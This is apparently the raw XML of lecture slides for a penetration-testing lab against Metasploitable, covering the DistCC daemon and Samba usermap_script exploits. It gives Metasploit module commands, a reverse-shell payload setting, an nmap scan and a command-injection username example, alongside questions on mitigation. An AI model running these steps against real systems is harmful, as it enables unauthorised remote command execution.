        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279449031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DF72AA-EC0B-599D-1AC6-8BD0E2FF1DFE}"/>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2157536-2FD3-BD68-0265-B28A34F0EF3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>In Metasploit, search for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>DistCC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> exploit: search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>distcc</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Use the exploit: use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>misc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>distcc_exec</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Set the target and payload:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23807305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BDBCB3-C175-E76A-87F0-EAB51BB61CCA}"/>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C2EB5299-2CF5-0CD1-EF94-0C0581490521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set RHOSTS [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> IP]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_perl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137064096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A397CE0-F591-4ECF-C6E6-C784A417A66C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="645458" y="663388"/>
            <a:ext cx="7869891" cy="5513575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Lab Exercise 6: Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>DistCC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> Daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Post-Exercise Questions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>What is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>DistCC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> Daemon primarily used for, and why might it be running on a server?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>How can the risks associated with tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>DistCC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> be mitigated while still leveraging their benefits?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Why is it essential to understand the implications of running compilers or other development tools on production servers?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244948762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4829DF-3E79-7C1A-5D69-398FF84754C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5D3F99C9-9ADB-9A37-3D8B-54E00A535453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324099909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1DDB36-AE02-5EDF-CE9C-2A6A058FB94B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Objective:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54462F93-D730-A94F-C6C9-11ECAC136C20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learn how to exploit the Samba </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usermap_script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command execution vulnerability.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39401101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697272-5A62-560D-54A9-8EB9415ACBFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="111827"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>usermap_script</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD46F7E-9C5D-CDF4-90F1-BD272DFD5972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usermap_script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> vulnerability in Samba is like giving someone a form to fill out, but instead of just writing their name, they also write a command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> When Samba reads the form, it mistakenly runs that command. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This happens because Samba doesn't check the form properly before using it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23861713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852829F-B90A-ACCB-A91B-16B87259C692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="645459"/>
            <a:ext cx="7905750" cy="5531504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Samba has a feature where it can change usernames using a special script, known as the "username map script." </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Imagine this script as a translator that converts one name to another. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>For example, it could change "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Bob_on_Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>" to just "Bob" on the Samba server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25963178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15AF3B6-D543-9280-0D77-C08C83F36AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654424" y="699247"/>
            <a:ext cx="7860926" cy="5477716"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Now, let's say an attacker writes "Bob; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>DeleteEverything</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>" as their username. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Samba, without checking if this name contains any sneaky commands, sends it to the "translator" script. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>The script then sees the ";" symbol, understands it as the end of one command and the start of another, and executes the "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>DeleteEverything</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>" command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29330764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FAF3044-4932-8794-353A-2064327FAE6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663388" y="860612"/>
            <a:ext cx="7851962" cy="5316351"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>The main problem here is that Samba doesn't properly inspect the usernames before sending them to the script. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>It trusts the input without questioning it. In cybersecurity, blindly trusting input is a common reason for vulnerabilities. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>This specific vulnerability in Samba allows attackers to run any command they want, which can lead to all sorts of problems, including taking over the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20006816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EC23BA-9519-0877-1778-72BEBFDF20F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steps:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D92CA5B3-EA06-24CC-D080-EEA431B8D387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Discovering Samba Version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Use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nmap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to identify the Samba version: </a:t>
            </a:r>
          </a:p>
          <a:p>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nmap</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-p 139,445 --script=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smb</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os</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-discovery [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> IP]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8717077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C2C809C-9BA2-F7AF-E502-372220B96DF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>2. Use Metasploit to Exploit:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01E2EFD6-32B1-D0C0-E077-6E395B0A6978}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Open Metasploit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Find the Samba exploit: search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>usermap_script</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Choose the right exploit: use exploit/multi/samba/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>usermap_script</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
